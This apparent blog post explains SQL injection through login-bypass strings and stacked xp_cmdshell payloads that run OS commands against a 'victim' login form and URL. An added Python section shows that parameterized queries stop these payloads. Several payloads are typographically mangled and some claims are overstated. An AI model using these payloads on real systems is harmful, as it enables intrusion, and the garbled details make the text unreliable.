
If you have been a regular reader of my blog, you might remember the following type of SQL queries:

1 ' OR ' 1 ' = ' 1
a ' OR ' 1 ' = ' 1

a ' OR ' a ' = ' a

Login: 1 ' OR ' 1 ' = ' 1
Password : 1 ' OR ' 1 ' = ' 1
http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1

and similar variants. They are all usually used to bypass a login page. While discussing SQL injection, I mentioned several times that SQL injection is a kind of command injection attack. You might wonder: if SQL injection is a kind of command injection attack, how can I execute commands using it? I intentionally left out the command injection part of SQL injection so that I could cover it while discussing command injection.

First of all, command injection using SQL injection works only on a Windows-based shell, which means it will not work on Linux. Now, how it works: as we know, SQL injection is not only a command injection but also a code injection attack, because each statement in SQL is interpreted code that terminates with ' ; ' (semicolon), which acts as the statement terminator. During SQL injection you intentionally never use the statement terminator, because you already know the web application adds it automatically. A hacker can exploit this to execute commands through SQL injection by terminating the statement and appending the following command:
exec master..xp_cmdshell “” --


If the victim is vulnerable to command injection via SQL injection, then any SQL query you can inject will 100% support the code appended above. Have a look at the following examples:

1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “dir c:\” –
1 ' ; exec master..xp_cmdshell “dir c:\” –


The above commands will list all folders and files on the victim's C drive.

a ' OR ' 1 ' = ' 1 ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –
a ' ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –


The above statements will add a file to the system containing the message You got hacked.

a ' OR ' a ' = ' a '; exec master..xp_cmdshell..xp “ping 127.0.0.1” --
Login: 1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell..xp “ping 127.0.0.1” --

The above statements will ping the victim system.

Password : 1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “ver” –

The above statement will display the name and version of the victim system. And there should be no surprise, because even this works:

http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “mkdir hacker” -

Source: nrupentheking.blogspot.com
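
On the prevention side, an added example that is not code from the original post: the post's login payload run against a concatenated query and against a parameterized one. It assumes Python with an in-memory SQLite database standing in for the ASP/SQL Server back end; `make_db`, `login_vulnerable`, `login_parameterized`, `parse_id` and the sample account are hypothetical names and constructed data.

```python
import sqlite3

def make_db():
    # Constructed sample data: one account in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db

def login_vulnerable(db, login, password):
    # BEFORE: input is pasted into the statement text, so a quote in the
    # input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT 1 FROM users WHERE login = '" + login +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, login, password):
    # AFTER: the statement text is fixed and the values are bound
    # separately, so they are only ever compared as data.
    sql = "SELECT 1 FROM users WHERE login = ? AND password = ?"
    return db.execute(sql, (login, password)).fetchone() is not None

def parse_id(raw):
    # For numeric parameters such as index.asp?id=1: digits only.
    if not (raw.isascii() and raw.isdigit()):
        raise ValueError("id must be a decimal integer")
    return int(raw)

# The post's payloads, typed without the extra spaces around the quotes.
TAUTOLOGY = "1' OR '1'='1"
STACKED = "1' ; exec master..xp_cmdshell \"dir c:\\\" --"

def demo():
    db = make_db()
    return {
        "vulnerable, real password": login_vulnerable(db, "alice", "s3cret"),
        "vulnerable, tautology": login_vulnerable(db, TAUTOLOGY, TAUTOLOGY),
        "parameterized, real password": login_parameterized(db, "alice", "s3cret"),
        "parameterized, tautology": login_parameterized(db, TAUTOLOGY, TAUTOLOGY),
        # SQLite has no xp_cmdshell; the string is only used as a bound value.
        "parameterized, stacked": login_parameterized(db, STACKED, STACKED),
    }

if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case}: {'accepted' if accepted else 'rejected'}")
```

On SQL Server the same fix is a parameterized command issued by the application, with `xp_cmdshell` left disabled (its default since SQL Server 2005) and the web application's login kept out of the sysadmin role.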




Last Updated (Tuesday, 21 June 2011 06:59)

 

Comments  

 
+1 #1 Dave 2011-06-21 07:04
But how do you prevent it?
http://www.texaswebdevelopers.com/blog/template_permalink.asp?id=107